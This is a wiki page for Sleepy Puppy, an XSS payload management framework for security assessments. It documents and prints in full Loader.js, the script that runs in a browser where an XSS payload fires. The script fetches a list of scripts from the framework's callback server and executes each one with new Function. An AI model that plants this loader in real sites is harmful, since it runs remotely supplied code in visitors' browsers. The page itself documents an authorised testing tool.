-
Notifications
You must be signed in to change notification settings - Fork 137
Loader.js
Scott Behrens edited this page Aug 25, 2015
·
1 revision
Loader.js is the actual PuppyScript that is loaded when a Payload is fired. Loader.JS always loads Jquery unless it is already loaded in the browser where the Payload fired.
Loader.js makes a request to the API endpoint puppyscript_loader/{{payload}}
to retrieve a list of ordered PuppyScripts to execute for the Payload. PuppyScripts execute in order but asynchronous scripts may finish execution at different times.
The Loader.js file is included below
console.log("Sleepy Puppy is a Cross-site Scripting Payload Management Framework")
console.log("Sleepy Puppy PuppyScripts will execute in the order they were configured, but may finish execution at different times depending on if the PuppyScripts are asyncronous.")
console.log("More information on Sleepy Puppy can be found here: https://github.com/Netflix/sleepy-puppy")
// Always load jQuery regardless of Puppyscripts
if (typeof jQuery === 'undefined') {
function getScript(url, success) {
var script = document.createElement('script');
script.src = url;
var head = document.getElementsByTagName('head')[0],
done = false;
script.onload = script.onreadystatechange = function () {
if (!done && (!this.readyState || this.readyState === 'loaded' || this.readyState === 'complete')) {
done = true;
success();
script.onload = script.onreadystatechange = null;
head.removeChild(script);
}
};
head.appendChild(script);
}
getScript('{{callback_protocol}}://{{hostname}}/static/jquery-1.11.3.min.js', function () {
loader();
});
} else {
$(document).ready(loader);
}
function loader () {
$.ajax({
type: 'GET',
url: "{{callback_protocol}}://{{hostname}}/api/puppyscript_loader/{{payload}}?a={{assessment}}",
dataType: 'json',
success: function (data) {
$.each(data, function(index, element) {
new Function(element.code)();
// debug
// console.log("Sleepy Puppy is executing Puppyscript " + index)
});
}
});
}